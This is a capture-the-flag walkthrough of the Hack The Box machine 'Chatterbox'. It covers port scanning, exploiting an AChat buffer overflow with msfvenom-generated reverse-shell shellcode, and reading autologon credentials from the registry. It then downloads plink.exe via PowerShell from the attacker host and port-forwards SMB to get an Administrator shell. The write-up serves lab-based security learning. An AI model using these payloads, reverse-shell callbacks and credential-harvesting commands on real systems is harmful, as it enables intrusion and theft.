Enumeration

Chatterbox is a pretty simple box and reminds me a lot of something you run across in the OSCP labs. Overall it’s pretty easy, the only sort of tricky part is with privesc if you aren’t familiar with port forwarding. If you follow my Windows Privilege Escalation Guide on this one, you’ll be golden. Before you do the box, make sure you’ve reset it otherwise you won’t get a shell.

[email protected]:~/htb/chatterbox# nmap -sV -p- 10.10.10.74 -T4

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-02 15:16 EST
Nmap scan report for 10.10.10.74
Host is up (0.050s latency).

PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
9256/tcp open  achat   AChat chat system

Nmap done: 1 IP address (1 host up)

Looks like AChat is our target. A quick Google returns an exploit in python:

https://www.exploit-db.com/exploits/36025/

The exploit payload is currently only going to run calc.exe, so we’ll need to generate a reverse shellcode payload. We can do this with msfvenom. Lucky for us the author of the exploit was nice enough to specify his exact command used in the comments, so we know the correct options along with which bad characters to exclude.

[email protected]:~/htb/chatterbox# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3706 bytes
buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x67\x78\x45\x32"
buf += "\x4b\x50\x39\x70\x79\x70\x63\x30\x52\x69\x47\x75\x6e"
buf += "\x51\x75\x70\x42\x44\x34\x4b\x42\x30\x4e\x50\x34\x4b"
buf += "\x52\x32\x4c\x4c\x42\x6b\x62\x32\x4b\x64\x32\x6b\x62"
buf += "\x52\x6d\x58\x4a\x6f\x74\x77\x6e\x6a\x6b\x76\x4c\x71"
buf += "\x6b\x4f\x76\x4c\x6d\x6c\x4f\x71\x51\x6c\x6d\x32\x4e"
buf += "\x4c\x4b\x70\x79\x31\x36\x6f\x6c\x4d\x4d\x31\x79\x37"
buf += "\x57\x72\x49\x62\x4e\x72\x6e\x77\x32\x6b\x42\x32\x4e"
buf += "\x30\x64\x4b\x4e\x6a\x6d\x6c\x72\x6b\x30\x4c\x4c\x51"
buf += "\x52\x58\x57\x73\x61\x38\x69\x71\x66\x71\x50\x51\x74"
buf += "\x4b\x52\x39\x6f\x30\x69\x71\x79\x43\x54\x4b\x31\x39"
buf += "\x5a\x78\x6b\x33\x4c\x7a\x61\x39\x42\x6b\x6d\x64\x32"
buf += "\x6b\x79\x71\x67\x66\x30\x31\x59\x6f\x54\x6c\x36\x61"
buf += "\x78\x4f\x6a\x6d\x6b\x51\x67\x57\x4f\x48\x37\x70\x72"
buf += "\x55\x48\x76\x7a\x63\x43\x4d\x5a\x58\x4d\x6b\x63\x4d"
buf += "\x6f\x34\x31\x65\x69\x54\x50\x58\x34\x4b\x4f\x68\x4d"
buf += "\x54\x6b\x51\x76\x73\x33\x36\x52\x6b\x6c\x4c\x30\x4b"
buf += "\x62\x6b\x4e\x78\x6b\x6c\x69\x71\x58\x53\x34\x4b\x4b"
buf += "\x54\x54\x4b\x39\x71\x58\x50\x43\x59\x4d\x74\x4b\x74"
buf += "\x6f\x34\x61\x4b\x61\x4b\x50\x61\x51\x49\x50\x5a\x32"
buf += "\x31\x49\x6f\x37\x70\x51\x4f\x71\x4f\x4e\x7a\x34\x4b"
buf += "\x6c\x52\x4a\x4b\x62\x6d\x71\x4d\x71\x58\x6f\x43\x6f"
buf += "\x42\x69\x70\x4b\x50\x43\x38\x61\x67\x50\x73\x30\x32"
buf += "\x71\x4f\x52\x34\x52\x48\x50\x4c\x73\x47\x6b\x76\x39"
buf += "\x77\x6b\x4f\x77\x65\x68\x38\x54\x50\x49\x71\x69\x70"
buf += "\x69\x70\x4b\x79\x46\x64\x72\x34\x30\x50\x61\x58\x6e"
buf += "\x49\x71\x70\x32\x4b\x4b\x50\x49\x6f\x39\x45\x4e\x70"
buf += "\x4e\x70\x4e\x70\x32\x30\x6d\x70\x42\x30\x6d\x70\x50"
buf += "\x50\x70\x68\x5a\x4a\x4a\x6f\x39\x4f\x49\x50\x59\x6f"
buf += "\x37\x65\x63\x67\x71\x5a\x6b\x55\x33\x38\x6a\x6a\x59"
buf += "\x7a\x6a\x6e\x4b\x57\x30\x68\x5a\x62\x69\x70\x59\x71"
buf += "\x35\x6b\x55\x39\x67\x76\x4f\x7a\x6c\x50\x51\x46\x51"
buf += "\x47\x31\x58\x44\x59\x37\x35\x44\x34\x71\x51\x69\x6f"
buf += "\x7a\x35\x52\x65\x69\x30\x33\x44\x6c\x4c\x79\x6f\x30"
buf += "\x4e\x69\x78\x34\x35\x4a\x4c\x62\x48\x6c\x30\x38\x35"
buf += "\x54\x62\x62\x36\x4b\x4f\x5a\x35\x4f\x78\x31\x53\x50"
buf += "\x6d\x51\x54\x4b\x50\x72\x69\x49\x53\x30\x57\x32\x37"
buf += "\x62\x37\x4c\x71\x6a\x56\x30\x6a\x5a\x72\x70\x59\x72"
buf += "\x36\x6b\x32\x79\x6d\x6f\x76\x76\x67\x50\x44\x6f\x34"
buf += "\x6d\x6c\x6d\x31\x49\x71\x72\x6d\x6d\x74\x4f\x34\x6c"
buf += "\x50\x37\x56\x69\x70\x4d\x74\x6e\x74\x30\x50\x50\x56"
buf += "\x6e\x76\x32\x36\x6e\x66\x32\x36\x50\x4e\x50\x56\x52"
buf += "\x36\x52\x33\x42\x36\x72\x48\x72\x59\x56\x6c\x4f\x4f"
buf += "\x53\x56\x69\x6f\x49\x45\x55\x39\x49\x50\x4e\x6e\x32"
buf += "\x36\x51\x36\x6b\x4f\x4e\x50\x53\x38\x4b\x58\x54\x47"
buf += "\x4b\x6d\x4f\x70\x69\x6f\x68\x55\x37\x4b\x7a\x50\x75"
buf += "\x65\x64\x62\x72\x36\x71\x58\x43\x76\x44\x55\x45\x6d"
buf += "\x55\x4d\x69\x6f\x39\x45\x4f\x4c\x6d\x36\x73\x4c\x79"
buf += "\x7a\x65\x30\x69\x6b\x67\x70\x74\x35\x49\x75\x67\x4b"
buf += "\x4d\x77\x5a\x73\x30\x72\x62\x4f\x30\x6a\x49\x70\x6e"
buf += "\x73\x69\x6f\x47\x65\x41\x41"

We can go ahead and edit the exploit with our newly generated shellcode. Start up a netcat listener and run our exploit.

[email protected]:~/htb/chatterbox# python 36025.py 
---->{P00F}!
[email protected]:~# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.74] 49157
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\alfred

Privilege Escalation

After running through some basic privilege escalation enumeration (ahem) we find some credentials in the registry for autologon.

C:\Windows\Panther>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ    Alfred
    DefaultPassword    REG_SZ    Welcome1!

It’s possible that password reuse may be at play here for the Administrator. To exploit this we’ll need to open up SMB on our target. We can do this by uploading plink.exe to our target and port forwarding over port 445.

First we start up our python http server.

[email protected]:~/htb/chatterbox# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Next we’ll download plink.exe using a powershell one liner.

C:\Users\Alfred>powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.8/plink.exe', 'plink.exe')"

Start SSH service on our attacking box.

[email protected]:~/htb/chatterbox# service ssh start

And run plink.exe from our target to forward the port over SSH.

C:\Users\Alfred>plink.exe -l root -pw  -R 445:127.0.0.1:445 10.10.14.8
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's rsa2 key fingerprint is:
ssh-rsa 2048 fc:4d:bc:2f:51:41:40:0d:2e:e2:86:a6:06:fb:98:88
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y


The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Aug 10 09:31:17 2017 from 10.10.10.43

[email protected]:~# 

We can verify the port forward is working with netstat.

[email protected]:~/htb/chatterbox# netstat -ano | grep 445
tcp        0      0 127.0.0.1:445           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp6       0      0 ::1:445                 :::*                    LISTEN      off (0.00/0/0)

Excellent. Now let’s use winexe to get a shell.

[email protected]:~/htb/chatterbox# winexe -U Administrator //127.0.0.1 "cmd.exe"
Enter password:
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\administrator

Success!